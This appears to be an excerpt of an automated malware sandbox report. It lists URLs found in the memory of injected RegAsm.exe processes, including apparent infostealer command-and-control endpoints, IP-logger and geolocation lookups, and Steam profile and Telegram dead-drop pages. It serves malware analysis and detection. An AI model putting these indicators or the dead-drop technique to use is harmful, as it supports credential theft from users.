                            Source: RegAsm.exe, 00000014.00000002.3179432809.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3190699075.0000000001699000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.20.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
                            Source: RegAsm.exe, 00000014.00000002.3179432809.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3190699075.0000000001699000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.20.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=pvBDaFhF2LLJ&l=e
                            Source: RegAsm.exe, 00000014.00000002.3179432809.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3190699075.0000000001699000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000027.00000002.2588002060.00000000012EF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.3010663108.0000000001489000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.20.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
                            Source: 76561199780418869[1].htm.20.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
                            Source: RegAsm.exe, 00000014.00000002.3179432809.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3190699075.0000000001699000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000027.00000002.2588002060.00000000012EF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.3010663108.0000000001489000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.20.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
                            Source: RegAsm.exe, 00000014.00000002.3179432809.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3190699075.0000000001699000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.3010663108.0000000001489000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.20.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
                            Source: RegAsm.exe, 00000014.00000002.3190699075.0000000001699000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.20.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                            Source: RegAsm.exe, 00000014.00000002.3179432809.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3190699075.0000000001699000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.20.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
                            Source: RegAsm.exe, 00000014.00000002.3179432809.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3190699075.0000000001699000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.20.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                            Source: RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.20.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                            Source: RegAsm.exe, 00000014.00000002.3179432809.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3190699075.0000000001699000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.20.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp
                            Source: RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.20.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
                            Source: RegAsm.exe, 00000014.00000002.3179432809.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3190699075.0000000001699000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.20.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
                            Source: RegAsm.exe, 00000014.00000002.3179432809.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3190699075.0000000001699000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.20.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
                            Source: RegAsm.exe, 00000013.00000002.2812494154.00000000279D6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
                            Source: RegAsm.exe, 00000013.00000002.2812494154.00000000279D6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                            Source: RegAsm.exe, 00000013.00000002.2783474686.00000000014D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                            Source: RegAsm.exe, 00000013.00000002.2783474686.00000000014D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                            Source: RegAsm.exe, 00000027.00000002.2588002060.00000000012EF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000027.00000002.2588002060.00000000012D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gravvitywio.store/
                            Source: RegAsm.exe, 00000027.00000002.2588002060.00000000012EF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000027.00000002.2588002060.00000000012D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gravvitywio.store/api
                            Source: RegAsm.exe, 00000027.00000002.2588002060.00000000012EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gravvitywio.store/api(
                            Source: RegAsm.exe, 00000027.00000002.2588002060.00000000012EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gravvitywio.store/x
                            Source: RegAsm.exe, 00000027.00000002.2589625219.000000000135A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gravvitywio.store:443/api
                            Source: RegAsm.exe, 0000002F.00000002.3450965793.000000000150B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                            Source: RegAsm.exe, 00000014.00000002.3190699075.0000000001699000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.20.drString found in binary or memory: https://help.steampowered.com/en/
                            Source: RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                            Source: RegAsm.exeString found in binary or memory: https://ipgeolocation.io/
                            Source: RegAsm.exe, 00000006.00000002.2325722695.00000000015A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/
                            Source: RegAsm.exe, 00000006.00000002.2325722695.00000000015EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/Mozilla/5.0
                            Source: f98ae5e6665140c7bc7a10ef5c598fcb.exe, 00000004.00000002.2206542664.0000000003B55000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/https://ipgeolocation.io/::
                            Source: RegAsm.exe, 00000006.00000002.2325722695.00000000015A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/r
                            Source: RegAsm.exe, 00000006.00000002.2325722695.00000000015A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/widget/demo/8.46.123.33
                            Source: RegAsm.exe, 00000006.00000002.2325722695.00000000015A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/widget/demo/8.46.123.33b
                            Source: RegAsm.exe, 00000006.00000002.2325722695.00000000015A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io:443/widget/demo/8.46.123.33
                            Source: RegAsm.exe, 00000006.00000002.2325722695.00000000015EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/
                            Source: RegAsm.exe, 00000006.00000002.2327479029.0000000003E6E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2325722695.000000000161A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/1nhuM4.js
                            Source: RegAsm.exe, 00000006.00000002.2325722695.00000000015EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/I
                            Source: RegAsm.exe, 00000006.00000002.2327479029.0000000003E8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org:443/1nhuM4.jso
                            Source: RegAsm.exe, 0000002F.00000002.3450965793.000000000150B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                            Source: RegAsm.exe, 0000002F.00000002.3450965793.000000000150B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                            Source: RegAsm.exe, 0000002F.00000002.3450965793.000000000150B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                            Source: RegAsm.exe, 00000023.00000002.3060192324.0000000022F54000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3066218215.0000000028ECC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3104338698.0000000040C89000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3086066708.0000000034DAE000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.19.dr, nss3.dll.19.drString found in binary or memory: https://mozilla.org0/
                            Source: RegAsm.exe, 0000002F.00000002.3450965793.000000000150B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                            Source: RegAsm.exe, 00000027.00000002.2588002060.00000000012D6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.3002399614.0000000001417000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://questionsmw.store/api
                            Source: RegAsm.exe, 00000027.00000002.2588002060.00000000012D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://questionsmw.store/api_i
                            Source: RegAsm.exe, 0000002B.00000002.3002399614.000000000143C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.3010663108.0000000001489000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                            Source: RegAsm.exe, 0000002F.00000002.3450965793.000000000150B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                            Source: RegAsm.exe, 0000002F.00000002.3450965793.000000000150B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                            Source: RegAsm.exe, 0000002F.00000002.3450965793.000000000150B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                            Source: RegAsm.exe, 0000002B.00000002.3002399614.000000000143C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://soldiefieop.site/api
                            Source: RegAsm.exe, 0000002B.00000002.3002399614.000000000143C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://soldiefieop.site/api4
                            Source: RegAsm.exe, 0000002B.00000002.3002399614.000000000143C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://soldiefieop.site/apiCH
                            Source: RegAsm.exe, 0000002B.00000002.3002399614.000000000143C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://soldiefieop.site/apiDH
                            Source: RegAsm.exe, 0000002F.00000002.3450965793.000000000150B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                            Source: RegAsm.exe, 0000002F.00000002.3450965793.000000000150B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                            Source: RegAsm.exe, 0000002F.00000002.3450965793.000000000150B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                            Source: RegAsm.exe, 0000002F.00000002.3450965793.000000000150B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                            Source: RegAsm.exe, 0000002B.00000002.3002399614.0000000001406000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com
                            Source: 76561199780418869[1].htm.20.drString found in binary or memory: https://steamcommunity.com/
                            Source: RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.20.drString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                            Source: RegAsm.exe, 0000002F.00000002.3450965793.0000000001551000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/O
                            Source: RegAsm.exe, 00000014.00000002.3190699075.0000000001699000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.20.drString found in binary or memory: https://steamcommunity.com/discussions/
                            Source: RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000027.00000002.2589625219.0000000001356000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.3002399614.0000000001406000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.20.drString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                            Source: 76561199780418869[1].htm.20.drString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199780418869
                            Source: RegAsm.exe, 00000014.00000002.3190699075.0000000001699000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.20.drString found in binary or memory: https://steamcommunity.com/market/
                            Source: RegAsm.exe, 00000014.00000002.3179432809.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3179432809.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3190699075.0000000001699000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.20.drString found in binary or memory: https://steamcommunity.com/my/wishlist/
                            Source: RegAsm.exe, 0000002B.00000002.3002399614.0000000001406000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.3002399614.000000000143C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
                            Source: RegAsm.exe, 00000027.00000002.2589625219.0000000001356000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
                            Source: RegAsm.exe, 0000002B.00000002.3002399614.000000000143C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900E
                            Source: RegAsm.exe, 00000027.00000002.2588002060.00000000012D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900b
                            Source: E4aR4O9hOTF5WJfvKNpcVCp8.exe, 0000000F.00000002.2354142791.00000000038E5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3190699075.000000000165F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.2984201099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.0000000001310000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.0000000001551000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869
                            Source: RegAsm.exe, 00000014.00000002.3190699075.0000000001699000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.20.drString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869/badges
                            Source: RegAsm.exe, 00000014.00000002.3179432809.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3190699075.0000000001699000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.20.drString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869/inventory/
                            Source: RegAsm.exe, 00000014.00000002.3190699075.000000000165F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869K
                            Source: RegAsm.exe, 0000002F.00000002.3450965793.0000000001551000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869l
                            Source: E4aR4O9hOTF5WJfvKNpcVCp8.exe, 0000000F.00000002.2354142791.00000000038E5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.2984201099.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.0
                            Source: RegAsm.exe, 00000014.00000002.3190699075.000000000165F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/q
                            Source: RegAsm.exe, 00000014.00000002.3190699075.0000000001699000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.20.drString found in binary or memory: https://steamcommunity.com/workshop/
                            Source: RegAsm.exe, 0000002B.00000002.3002399614.000000000143C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com:443/profiles/76561199724331900
                            Source: 76561199780418869[1].htm.20.drString found in binary or memory: https://store.steampowered.com/
                            Source: RegAsm.exe, 0000002F.00000002.3450965793.000000000150B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                            Source: RegAsm.exe, 0000002B.00000002.3002399614.000000000143C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5f
                            Source: 76561199780418869[1].htm.20.drString found in binary or memory: https://store.steampowered.com/about/
                            Source: RegAsm.exe, 00000014.00000002.3179432809.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3179432809.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3190699075.0000000001699000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.20.drString found in binary or memory: https://store.steampowered.com/explore/
                            Source: RegAsm.exe, 00000014.00000002.3190699075.0000000001699000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000027.00000002.2589625219.0000000001356000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.3002399614.0000000001406000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.20.drString found in binary or memory: https://store.steampowered.com/legal/
                            Source: RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.20.drString found in binary or memory: https://store.steampowered.com/mobile
